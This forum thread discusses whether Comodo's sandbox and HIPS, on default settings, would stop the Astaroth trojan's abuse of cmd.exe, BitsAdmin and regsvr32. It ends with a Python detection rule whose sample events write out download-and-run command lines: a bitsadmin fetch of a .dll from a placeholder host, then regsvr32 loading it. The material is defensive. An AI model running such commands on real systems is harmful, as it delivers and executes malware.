Astaroth vs CIS Sandbox and HIPS, what would happen?

Astaroth is a Trojan that uses legitimate processes in order to download, install and run the malware.

Overview:

https://i.ibb.co/gdZFGPw/image.png

I would expect CIS to contain the malicious modules once they are executed by the relative trusted parent files. Or even contain the JavaScript from reaching a non-sandboxed version of BitsAdmin. However I just wanted to double check if either would be the case.

More info on the Astaroth Trojan: Astaroth Malware Uses Legitimate OS and Antivirus Processes to Steal Passwords and Personal Data

Look forward to learning more about this!

Only if embedded-code detection is turned on for cmd.exe which by default is disabled due to many complaints.

So you are saying this might be a bypass on default settings?

Yes, up to a certain extent, as I think that once it reaches the stage of executing a .dll file using regsvr32 it should be stopped at that point, assuming it doesn’t use the Avast process if Avast is not installed.

Ah, that is what I was thinking. I wasn’t sure on the JavaScript bit though.

Very interesting, thanks!

Sorry, but I missed something. Does “Only if embedded-code detection is turned on for cmd.exe which by default is disabled” mean I’m vulnerable, or does “Only if embedded-code detection is turned on for cmd.exe which by default is disabled” mean I’m protected?

You may be vulnerable to an extent, as mentioned above, if embedded-code detection for cmd.exe is turned off.

I just took a look at my settings, and Embedded Code Detection is disabled for regsvr32 as well as cmd.exe. Does that mean I am completely vulnerable? Is there a best practice for what to enable Embedded Code Detection against?

First of all, you may not be completely vulnerable.

This is because the malware relies on .dll files to run the main payload.

Comodo is still likely to contain these .dll files as soon as they are executed. Thus the main payload will likely be contained as normal.

Enabling ‘Embedded Code Detection’ for cmd.exe may be enough to prevent the exploit up to that point from happening in the first place though.

As for best practice in general of what to enable/disable, I will leave that to someone else to answer.

I would prefer that Comodo at least enables more files under ‘Embedded Code Detection’ by default.
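Whatever the sandbox does, the chain the thread describes (cmd.exe embedded code or JavaScript, a BitsAdmin download, then regsvr32 loading the dropped .dll) is also visible in process-creation telemetry. The following is an added example, not code from the thread or from Comodo: it runs simple detection logic over constructed events in a hypothetical, simplified layout (host, parent image, image, command line), and escalates when both stages show up on the same host.

```python
"""Flag the Astaroth-style living-off-the-land chain discussed in the thread
over constructed process-creation events. The event layout is hypothetical,
not any vendor's schema; hosts, paths and names below are made up."""
import re
from typing import Dict, List

SCRIPT_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe"}  # where embedded code / JavaScript runs
DOWNLOADER = "bitsadmin.exe"                              # built-in tool abused to fetch the payload
DLL_LOADER = "regsvr32.exe"                               # built-in tool abused to run the dropped .dll
# Locations a signed loader should rarely be asked to load a DLL from.
USER_WRITABLE = re.compile(r"\\(appdata|temp|users\\public)\\", re.IGNORECASE)

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def classify(event: Dict[str, str]) -> List[str]:
    """Return the detection names that a single process-creation event triggers."""
    parent, image, cmd = basename(event["parent"]), basename(event["image"]), event["cmdline"]
    hits: List[str] = []
    if parent in SCRIPT_HOSTS and image == DOWNLOADER and re.search(r"/transfer\b", cmd, re.I):
        hits.append("bits-transfer-from-script-host")
    if image == DLL_LOADER and re.search(r"\.dll\b", cmd, re.I) and USER_WRITABLE.search(cmd):
        hits.append("regsvr32-dll-from-user-writable-path")
    return hits

def scan(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Classify every event and, per host, escalate when both stages of the chain appear."""
    per_host: Dict[str, List[str]] = {}
    for ev in events:
        per_host.setdefault(ev["host"], []).extend(classify(ev))
    for hits in per_host.values():
        if {"bits-transfer-from-script-host", "regsvr32-dll-from-user-writable-path"} <= set(hits):
            hits.append("astaroth-like-lolbin-chain")
    return per_host

# Constructed sample telemetry: ws01 shows the full chain, ws02 only benign activity.
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c start"},
    {"host": "ws01", "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job /download http://example.invalid/a C:\Users\bob\AppData\Local\Temp\a.dll"},
    {"host": "ws01", "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s C:\Users\bob\AppData\Local\Temp\a.dll"},
    {"host": "ws02", "parent": r"C:\Windows\System32\services.exe", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s C:\Windows\System32\vendor.dll"},  # benign: DLL from a system path
    {"host": "ws02", "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /list"},                              # benign: no transfer job
]

if __name__ == "__main__":
    for host, hits in scan(SAMPLE_EVENTS).items():
        print(host, hits or "clean")
```

Enabling Embedded Code Detection, as the replies suggest, aims to block the first stage; a rule like this is the complementary check that tells you whether the later stages ever ran.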